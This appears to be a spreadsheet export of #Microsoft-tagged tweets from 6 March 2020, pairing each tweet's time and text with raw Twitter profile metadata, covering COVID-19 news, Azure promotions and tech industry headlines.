    <t>{'id': 9578762, 'id_str': '9578762', 'name': 'Stefan Stranger', 'screen_name': 'sstranger', 'location': '', 'description': 'Consultant and automation enthusiast at Microsoft. Cloud Native Employee. Wannabe programmer. And just a cool guy to follow. #DevOps | #PowerShell | #Azure', 'url': 'https://t.co/vwJYA3IlMz', 'entities': {'url': {'urls': [{'url': 'https://t.co/vwJYA3IlMz', 'expanded_url': 'http://about.me/sstranger', 'display_url': 'about.me/sstranger', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3382, 'friends_count': 1705, 'listed_count': 444, 'created_at': 'Sun Oct 21 13:13:08 +0000 2007', 'favourites_count': 9453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 44450,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'http://pbs.twimg.com/profile_images/1147875954619846657/zNmO9Jr5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1147875954619846657/zNmO9Jr5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/9578762/1481526968', 'profile_link_color': '0000FF', 'profile_sidebar_border_color': '87BC44', 'profile_sidebar_fill_color': 'F3772B', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 07:09:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft $MSFT says two employees have been diagnosed with #Coronavirus https://t.co/W2eJS16z1u https://t.co/agSlnq9y0h</t>
  </si>
  <si>
    <t>{'id': 1089978712685273090, 'id_str': '1089978712685273090', 'name': 'Stock Market News', 'screen_name': 'Stock_Market_Pr', 'location': '', 'description': 'Join us at https://t.co/hIgpgmTMGU - Stock Market News and Press Releases. Shop Stock Store at https://t.co/q4UnLpA9cR', 'url': 'https://t.co/yWIAIEqgCO', 'entities': {'url': {'urls': [{'url': 'https://t.co/yWIAIEqgCO', 'expanded_url': 'https://StocksNewsFeed.com', 'display_url': 'StocksNewsFeed.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/hIgpgmTMGU', 'expanded_url': 'http://StocksNewsFeed.com', 'display_url': 'StocksNewsFeed.com', 'indices': [11, 34]}, {'url': 'https://t.co/q4UnLpA9cR', 'expanded_url': 'https://stocksnewsfeed.com/shop', 'display_url': 'stocksnewsfeed.com/shop', 'indices': [95, 118]}]}}, 'protected': False, 'followers_count': 620, 'friends_count': 30, 'listed_count': 10, 'created_at': 'Mon Jan 28 20:09:10 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43752, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1089979474823790598/SBXMPXJt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1089979474823790598/SBXMPXJt_normal.jpg',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</si>
  <si>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07:05:10 +0000 2020</t>
  </si>
  <si>
    <t>TeBS leverages the power of the #Microsoft 
#PowerPlatform- #PowerApps, 
#PowerBI and #Flow to customize, extend, and build all the apps you need for your business and unlock the potential of #Office365 and #Dynamics365.
Click here to read more: https://t.co/86gdZSfNjr
#MSPartner https://t.co/Snm7YCOOCS</t>
  </si>
  <si>
    <t>{'id': 2202685754, 'id_str': '2202685754', 'name': 'Total eBiz Solutions', 'screen_name': 'Total_ebiz', 'location': '31 Ubi Road 1, #06-01, Singapore 408694', 'description': 'Total eBiz Solutions (TeBS) is a trusted technology partner for your digital transformation journey. Specializing in SharePoint, RPA, IoT, Mobile Solutions.', 'url': 'https://t.co/OLR3Rmij3d', 'entities': {'url': {'urls': [{'url': 'https://t.co/OLR3Rmij3d', 'expanded_url': 'https://www.totalebizsolutions.com/', 'display_url': 'totalebizsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 456, 'listed_count': 7, 'created_at': 'Tue Nov 19 07:50:34 +0000 2013', 'favourites_count': 260, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 821,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'http://pbs.twimg.com/profile_images/1042982976563306496/OCfJD75l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042982976563306496/OCfJD75l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2202685754/1500633729',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</si>
  <si>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07:05:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft sets a good example -&amp;gt;  As we work to protect public health, we also need to protect the income of hourly workers who support our campus https://t.co/b0PrTzyP0u</t>
  </si>
  <si>
    <t>{'id': 777823350, 'id_str': '777823350', 'name': 'Thomas Tomow [Microsoft #Azure MVP]', 'screen_name': 'toto_san1', 'location': '', 'description': 'MVP award by Microsoft, Azure, COMMUNITY, team leader, cloud, IoT &amp; AI, @AzureStuttgart, @Azure_kn, DevOps, photography, ç©ºæ‰‹, æ—¥æœ¬èªž', 'url': 'https://t.co/sXWMaSs5dO', 'entities': {'url': {'urls': [{'url': 'https://t.co/sXWMaSs5dO', 'expanded_url': 'http://www.tomow.de', 'display_url': 'tomow.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 354, 'friends_count': 320, 'listed_count': 37, 'created_at': 'Fri Aug 24 09:49:31 +0000 2012', 'favourites_count': 642, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6666,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'http://pbs.twimg.com/profile_images/1107766451136397312/UNQTZD8R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1107766451136397312/UNQTZD8R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/777823350/1370587200',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</si>
  <si>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07:03:23 +0000 2020</t>
  </si>
  <si>
    <t>Whoever willing to deal with company called #Webnet #pakistan for #website #CMS and required reference, I can share my personal issue. to avoid losing your #invest.! #google #microsoft #Amazon #development</t>
  </si>
  <si>
    <t>{'id': 47570167, 'id_str': '47570167', 'name': 'ðŸ‡ªðŸ‡¬ðŸ…¢ðŸ…ðŸ…›ðŸ…›ðŸ…ðŸ…œ ðŸ‡¶ðŸ‡¦', 'screen_name': 'mohamed_sallam', 'location': 'Qatar', 'description': 'Sales &amp; Marketing Manager for #IT, #Scan_BIM, #ELV #timelapse, always looking for new #business #opportunity #freelancer', 'url': 'https://t.co/DiA4o4GYdx', 'entities': {'url': {'urls': [{'url': 'https://t.co/DiA4o4GYdx', 'expanded_url': 'http://qa.linkedin.com/pub/mohamed-sallam-looking-for-a-new-challenge-role/19/36b/218', 'display_url': 'qa.linkedin.com/pub/mohamed-saâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 246, 'friends_count': 1814, 'listed_count': 4, 'created_at': 'Tue Jun 16 07:34:55 +0000 2009', 'favourites_count': 329, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5061,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'http://pbs.twimg.com/profile_images/757340601020981248/6AtjUWhX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/757340601020981248/6AtjUWhX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47570167/1538021818',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</si>
  <si>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Fri Mar 06 07:02:55 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus cases surge across U.S. as #Americans face looming outbreak https://t.co/WVy06Z5Fef #LosAngeles #California #Seattle #economy #growth #health #WHO #airports #travel #tourism #Trump #Texas #SanFrancisco #COVID19 #Amazon #Microsoft #Facebook #NewYork #WallStreet</t>
  </si>
  <si>
    <t>{'id': 479398450, 'id_str': '479398450', 'name': 'Marco Vergari', 'screen_name': 'marco_vrg', 'location': 'Lugo (RA), Italy', 'description': 'Financial consultant  interested in financial mkts, hedge funds, #assetmanagement , #tech, #SRI, #ESG , former financial reporter, CAIA charthldr', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8366, 'friends_count': 8665, 'listed_count': 14, 'created_at': 'Tue Jan 31 10:22:44 +0000 2012', 'favourites_count': 642, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3102,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1052932185974603776/MC9A0rBy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052932185974603776/MC9A0rBy_normal.jpg', 'profile_link_color': 'FF0000',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</si>
  <si>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07:01:22 +0000 2020</t>
  </si>
  <si>
    <t>FREE Microsoft Dynamics 365 &amp;amp; Power Apps Development Course #microsoft #dynamics365 #powerapps #development #dynamics #course #CRM
https://t.co/4LNH33jUU6</t>
  </si>
  <si>
    <t>{'id': 879776139664805888, 'id_str': '879776139664805888', 'name': 'Course Coupon Club', 'screen_name': 'Course_club', 'location': 'World', 'description': 'Free Courses and 100% OFF Udemy coupon codes updated daily #Udemy #coursecouponclub #udemycourse #coursera #edX #udemycouponclub', 'url': 'https://t.co/10HbBYEXik', 'entities': {'url': {'urls': [{'url': 'https://t.co/10HbBYEXik', 'expanded_url': 'http://www.interviewgig.com/udemycoupon/', 'display_url': 'interviewgig.com/udemycoupon/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 202, 'friends_count': 937, 'listed_count': 10, 'created_at': 'Tue Jun 27 18:59:11 +0000 2017', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8282,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'http://pbs.twimg.com/profile_images/1161838124692959232/Zs17vb2s_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161838124692959232/Zs17vb2s_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/879776139664805888/1565838807',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</si>
  <si>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06:59:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft: 99.9% of compromised accounts did not use multi-factor authentication https://t.co/5ELvQQxOu3 #Microsoft</t>
  </si>
  <si>
    <t>Fri Mar 06 06:58:01 +0000 2020</t>
  </si>
  <si>
    <t>Free #Webinar - On March 11, the #SQLServer team will present Big Data Clusters.
https://t.co/yZPj3irnvU
#tsql #sqldba #BigDataClusters #Spark #Oracle #MongoDB #azure #AzureSQLDB #SQLServer2019 #microsoft #madeiradata https://t.co/7lczSEDUEw</t>
  </si>
  <si>
    <t>{'id': 718996980, 'id_str': '718996980', 'name': 'Vitaly Bruk', 'screen_name': 'VitalyBruk', 'location': 'Israel', 'description': 'Data Consultant and SQL Server expert at Madeira Data Solutions. More about me and my articles - https://t.co/SerPRbyshx', 'url': 'https://t.co/FuJJtxXpmd', 'entities': {'url': {'urls': [{'url': 'https://t.co/FuJJtxXpmd', 'expanded_url': 'http://madeiradata.com', 'display_url': 'madeiradata.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/SerPRbyshx', 'expanded_url': 'http://linkedin.com/in/vitalybruk', 'display_url': 'linkedin.com/in/vitalybruk', 'indices': [97, 120]}]}}, 'protected': False, 'followers_count': 55, 'friends_count': 252, 'listed_count': 4, 'created_at': 'Thu Jul 26 23:35:16 +0000 2012', 'favourites_count': 176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 631,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'http://pbs.twimg.com/profile_images/1167537338580443137/WoYqfDDp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167537338580443137/WoYqfDDp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/718996980/1567197570',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</si>
  <si>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06:54:38 +0000 2020</t>
  </si>
  <si>
    <t>11 Gold and 2 Silver @GabItSolution 
Im proud to be a part of such an awesome team! #Microsoft #Partner https://t.co/Aoq1UT2pJw</t>
  </si>
  <si>
    <t>{'id': 36930817, 'id_str': '36930817', 'name': 'Ryan Van Cleave â˜ï¸ðŸ¤˜ðŸ»', 'screen_name': 'ryanvancleave', 'location': 'Heidelberg, Germany', 'description': 'Senior Consultant @GABITSolution | #ModernWorkplace and Cloud Advocate | Using #PowerShell to automate all the things! | Co-Founder of @PSUGRheinNeckar', 'url': 'https://t.co/Ed0vKG3zPk', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ed0vKG3zPk', 'expanded_url': 'http://msftaddict.com', 'display_url': 'msftaddict.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 275, 'friends_count': 866, 'listed_count': 5, 'created_at': 'Fri May 01 12:17:58 +0000 2009', 'favourites_count': 2167, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1891,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'http://pbs.twimg.com/profile_images/1142078249259941889/af0XBQ0w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142078249259941889/af0XBQ0w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36930817/1561303726',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</si>
  <si>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06:52:28 +0000 2020</t>
  </si>
  <si>
    <t>How to keep up to date on Microsoft Blogs using a combined RSS and Flow https://t.co/ngHGrH14Z6  #microsoft-flow, #rss, #tips, #tips-and-tricks, #rss-feeds</t>
  </si>
  <si>
    <t>{'id': 85271847, 'id_str': '85271847', 'name': 'Paul Keijzers #MVP #Office365 #MicrosoftTEAMS', 'screen_name': 'KbWorks', 'location': 'Amsterdam, Nederland', 'description': '#MicrosoftTeams Specialist #SharePoint and #Office365[#MVP] , If you have questions please feel free to ask. https://t.co/DD71uYd2mY work #KbWorks at #msignite', 'url': 'https://t.co/rhjmJjPk7O', 'entities': {'url': {'urls': [{'url': 'https://t.co/rhjmJjPk7O', 'expanded_url': 'http://www.KbWorks.nl', 'display_url': 'KbWorks.nl', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/DD71uYd2mY', 'expanded_url': 'https://kbworks.nl/blog/', 'display_url': 'kbworks.nl/blog/', 'indices': [109, 132]}]}}, 'protected': False, 'followers_count': 4455, 'friends_count': 2324, 'listed_count': 372, 'created_at': 'Mon Oct 26 08:50:27 +0000 2009', 'favourites_count': 4468, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 48391,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'http://pbs.twimg.com/profile_images/1187285224088051712/CqUvxw2n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1187285224088051712/CqUvxw2n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/85271847/1560438432',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</si>
  <si>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Fri Mar 06 06:52:13 +0000 2020</t>
  </si>
  <si>
    <t>Az Update:  Azure Databox, Exam Study Guides, PowerShell 7, Free Office 365 E1 trial https://t.co/2DmH0WEm2r #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1039406095976955905, 'id_str': '1039406095976955905', 'name': 'Microsoft IT Pro News', 'screen_name': 'MSITProNews', 'location': '', 'description': 'Unofficial automated feed on #Microsoft related IT Pro News. No ads.\n\nSources: @MSTCommunity, @Azure, @Ch9', 'url': 'https://t.co/JEVsC3qrLP', 'entities': {'url': {'urls': [{'url': 'https://t.co/JEVsC3qrLP', 'expanded_url': 'https://www.adamfowlerit.com', 'display_url': 'adamfowlerit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 297, 'friends_count': 2, 'listed_count': 7, 'created_at': 'Tue Sep 11 06:51:39 +0000 2018', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6431,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'http://pbs.twimg.com/profile_images/1039407446219837445/0xAbGVUa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039407446219837445/0xAbGVUa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1039406095976955905/1575932259', 'profile_link_color': '2D89EF',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</si>
  <si>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06:49:00 +0000 2020</t>
  </si>
  <si>
    <t>"Mindset is one of the biggest pieces to be successful in your digital journey," says @TexasChildrens' CISO Teresa Tonthat. 
#HPEalliances #Microsoft #HybridCloud #CIO #cloud
#DigitalTransformation #CISO #HIMSS20 #IoT #IWD2020 https://t.co/G9sNdQJn6d</t>
  </si>
  <si>
    <t>Fri Mar 06 06:45:00 +0000 2020</t>
  </si>
  <si>
    <t>Designed to help you gain a deeper understanding of #Microsoft #Azure &amp;amp; allowing us to understand your IT landscape &amp;amp; needs, Azure Fundamentals allows us to recommend &amp;amp; advise you, around moving your workload services to the #cloud. Find out more https://t.co/i6qYJGIqL2</t>
  </si>
  <si>
    <t>{'id': 278080884, 'id_str': '278080884', 'name': 'Phoenix Software', 'screen_name': 'PhoenixYork', 'location': 'York', 'description': 'Nearly 30 yearsâ€™ experience of advising customers on the best-fit #SoftwareLicensing, #Hardware, #Cloud, #SAM &amp; #ITServices. Part of the Bytes Technology Group.', 'url': 'http://t.co/2NNhWmmSM0', 'entities': {'url': {'urls': [{'url': 'http://t.co/2NNhWmmSM0', 'expanded_url': 'http://www.phoenixs.co.uk', 'display_url': 'phoenixs.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1522, 'friends_count': 1410, 'listed_count': 226, 'created_at': 'Wed Apr 06 15:31:05 +0000 2011', 'favourites_count': 482, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12700,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'http://pbs.twimg.com/profile_images/1019930629788651520/__wqQbOd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019930629788651520/__wqQbOd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/278080884/1534166749', 'profile_link_color': 'F37021',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</si>
  <si>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06:44:29 +0000 2020</t>
  </si>
  <si>
    <t>Hundreds of Microsoft sub-domains open to hijacking
#cybersecurity #informationsecurity #networksecurity #informationtechnology #hacking #securitynews #vulnerability #vaultinfosec #wevowyoursecurity #cyberattack #malware #websecurity #azure #microsoft 
https://t.co/UHq846yLdQ</t>
  </si>
  <si>
    <t>{'id': 4330514055, 'id_str': '4330514055', 'name': 'Vault Infosec', 'screen_name': 'vaultinfosec', 'location': 'Chennai, Tamil Nadu', 'description': 'We Vow Your Security \nSecurity Engineering | Infrastructure | Consulting | Next-Gen solutions | Training #cybersecurity #networking #wevowyoursecurity', 'url': 'https://t.co/0a7uOR84ga', 'entities': {'url': {'urls': [{'url': 'https://t.co/0a7uOR84ga', 'expanded_url': 'http://vaultinfosec.com/', 'display_url': 'vaultinfosec.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 82, 'friends_count': 55, 'listed_count': 3, 'created_at': 'Mon Nov 30 16:19:27 +0000 2015', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 345,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'http://pbs.twimg.com/profile_images/1209066120939855872/q_G5jUl-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209066120939855872/q_G5jUl-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4330514055/1577098803',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</si>
  <si>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06:41:02 +0000 2020</t>
  </si>
  <si>
    <t>Update to the #Microsoft Authenticator app now rolling out https://t.co/XRx6hh9wUA https://t.co/x77gFqxSWZ</t>
  </si>
  <si>
    <t>{'id': 2477907980, 'id_str': '2477907980', 'name': 'Sjoukje Zaal', 'screen_name': 'SjoukjeZaal', 'location': 'Lisse, Nederland', 'description': 'CTO Microsoft @Capgemini - Microsoft Azure MVP - Founder @_techchronicle &amp; @mixugnl - @AzureThursday - @GlobalAzure', 'url': 'https://t.co/Bg6Ci2sUqO', 'entities': {'url': {'urls': [{'url': 'https://t.co/Bg6Ci2sUqO', 'expanded_url': 'https://sjoukjezaal.com', 'display_url': 'sjoukjezaal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11289, 'friends_count': 7084, 'listed_count': 239, 'created_at': 'Mon May 05 06:11:29 +0000 2014', 'favourites_count': 1683, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13075,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'http://pbs.twimg.com/profile_images/1169850679134810113/nlfqy-Ya_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169850679134810113/nlfqy-Ya_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2477907980/1575903440',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</si>
  <si>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06:35:31 +0000 2020</t>
  </si>
  <si>
    <t>Az #Update:  #AzureDatabox, #ExamStudy Guides, PowerShell 7, Free Office 365 E1 trial https://t.co/8W5XA1Ir08 #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Fri Mar 06 06:30:03 +0000 2020</t>
  </si>
  <si>
    <t>If you thought App Development was just for millennials, think again!  In just one day, you can create a custom app that will enhance your business - without having to write code! Join Fusion5 at App in a Day on Tuesday 10 March to find out how. #Microsoft https://t.co/u23J4D4m1e</t>
  </si>
  <si>
    <t>{'id': 64102674, 'id_str': '64102674', 'name': 'Sylvia Bautovic', 'screen_name': 'SylviaBautovic', 'location': 'Sydney, New South Wales', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 162, 'friends_count': 103, 'listed_count': 17, 'created_at': 'Sun Aug 09 03:31:02 +0000 2009', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13165,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'http://pbs.twimg.com/profile_images/523217809359118336/kPy-LYAd_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/523217809359118336/kPy-LYAd_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/64102674/1465387776', 'profile_link_color': 'F5ABB5', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '36202A', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 06:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat........ #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB52hSFh</t>
  </si>
  <si>
    <t>{'id': 1057148786189824000, 'id_str': '1057148786189824000', 'name': 'www.THEPIGEONEXPRESS.com', 'screen_name': 'TPE_connect', 'location': 'online', 'description': 'The Pigeon Express - Public connection account of the @PigeonExpress_\n\n|| News Feed Loop', 'url': 'https://t.co/gGYeKLwzES', 'entities': {'url': {'urls': [{'url': 'https://t.co/gGYeKLwzES', 'expanded_url': 'https://thepigeonexpress.com', 'display_url': 'thepigeonexpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 645, 'friends_count': 111, 'listed_count': 7, 'created_at': 'Tue Oct 30 05:54:46 +0000 2018', 'favourites_count': 4094, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 39432, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1167832452313731075/OE7HGstW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167832452313731075/OE7HGstW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1057148786189824000/1567260621',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</si>
  <si>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06:28:29 +0000 2020</t>
  </si>
  <si>
    <t>One of the reasons why I love working for #Microsoft 
"Microsoft will pay hourly workers regular wages even if their hours are reduced because of COVID-19" https://t.co/6dcIgSfXvU</t>
  </si>
  <si>
    <t>{'id': 85556401, 'id_str': '85556401', 'name': 'Anne Michels', 'screen_name': 'Anne_Michels', 'location': 'Seattle, WA', 'description': 'Director @MicrosoftTeams Marketing | Speaker | Mother | all opinions = my own | https://t.co/IOrkWUjUbz', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/IOrkWUjUbz', 'expanded_url': 'http://www.instagram.com/anne_michels', 'display_url': 'instagram.com/anne_michels', 'indices': [80, 103]}]}}, 'protected': False, 'followers_count': 8896, 'friends_count': 675, 'listed_count': 290, 'created_at': 'Tue Oct 27 12:23:30 +0000 2009', 'favourites_count': 7409, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3893,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'http://pbs.twimg.com/profile_images/648578663550578688/-MCu7IJp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/648578663550578688/-MCu7IJp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/85556401/1468784517',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</si>
  <si>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Mar 06 06:24:38 +0000 2020</t>
  </si>
  <si>
    <t>#Jio-#Microsoft partnership will define this decade: #MukeshAmbani
https://t.co/LdoDNYWA5V</t>
  </si>
  <si>
    <t>{'id': 66632352, 'id_str': '66632352', 'name': 'JK Saraswat', 'screen_name': 'jksaraswat', 'location': 'India', 'description': "#IITR   #Engineering  #Management  #Leadership  #Life &amp; #Wellness updates\n\nFollowing / RT doesn't mean endorsement.", 'url': 'https://t.co/EZn2Eqwak4', 'entities': {'url': {'urls': [{'url': 'https://t.co/EZn2Eqwak4', 'expanded_url': 'https://in.linkedin.com/in/jksaraswat', 'display_url': 'in.linkedin.com/in/jksaraswat', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 725, 'friends_count': 333, 'listed_count': 152, 'created_at': 'Tue Aug 18 08:34:13 +0000 2009', 'favourites_count': 284, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4162,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'http://pbs.twimg.com/profile_images/784381533570248704/f9TT78RY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784381533570248704/f9TT78RY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/66632352/1488632783',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</si>
  <si>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06:24:28 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft are giving away enterprise conferencing tools due to the coronavirus. I hear Cisco is doing this as well. https://t.co/e2i6QjZgFc
#google #microsoft #collaboration https://t.co/WtoOWJtxBG</t>
  </si>
  <si>
    <t>{'id': 56769163, 'id_str': '56769163', 'name': 'Pauli Kongas', 'screen_name': 'pkongas', 'location': 'Finland', 'description': 'Leading the revolution for a better world for the knowledge worker. Unified communications and collaboration @konecorporation', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 214, 'friends_count': 287, 'listed_count': 7, 'created_at': 'Tue Jul 14 18:15:48 +0000 2009', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 366,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'http://pbs.twimg.com/profile_images/378800000185403251/b5716878d246e8f1d5bb9be68227f9c2_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000185403251/b5716878d246e8f1d5bb9be68227f9c2_normal.jpeg',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</si>
  <si>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Fri Mar 06 06:24:09 +0000 2020</t>
  </si>
  <si>
    <t>#Jio-#Microsoft partnership will define this decade: #MukeshAmbani
https://t.co/5pM3YaTpoY</t>
  </si>
  <si>
    <t>{'id': 3306724225, 'id_str': '3306724225', 'name': 'Data Driven World', 'screen_name': 'GlobalDataInfo', 'location': 'Gurgaon, India', 'description': 'Global #Technology #BigData #IoT #IIoT #M2M #SmartCities and emerging #Technologies. Also @jksaraswat. Following or RT does not mean endorsement.', 'url': 'https://t.co/8Odqe3kMFR', 'entities': {'url': {'urls': [{'url': 'https://t.co/8Odqe3kMFR', 'expanded_url': 'http://in.linkedin.com/in/jksaraswat', 'display_url': 'in.linkedin.com/in/jksaraswat', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 321, 'friends_count': 232, 'listed_count': 66, 'created_at': 'Wed Aug 05 06:38:38 +0000 2015', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 725,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'http://pbs.twimg.com/profile_images/628843013603762176/Pd7OOO12_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/628843013603762176/Pd7OOO12_normal.jpg',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</si>
  <si>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06:22:28 +0000 2020</t>
  </si>
  <si>
    <t>If youre working with  #azure, staying up to date is very important. To help with that, I have prepared yet another subjective completion of the new and noteworthy from the  #microsoft  #cloud ecosystem.
https://t.co/CGsVx4AD1f</t>
  </si>
  <si>
    <t>{'id': 73347474, 'id_str': '73347474', 'name': 'RadosÅ‚aw Wiankowski', 'screen_name': 'rwiankowski', 'location': 'Amsterdam, NL', 'description': 'Cloud Solution Architect working with Azure. Technology passionate, DevOps Padawan.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 37, 'listed_count': 0, 'created_at': 'Fri Sep 11 09:22:38 +0000 2009', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1108778492311801856/RQDFGTGq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108778492311801856/RQDFGTGq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/73347474/1544179114',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</si>
  <si>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06:21:55 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft  Youve got a good heart . 
https://t.co/RSNB3i19ZQ
#ethics #Leadership #employeebenefits</t>
  </si>
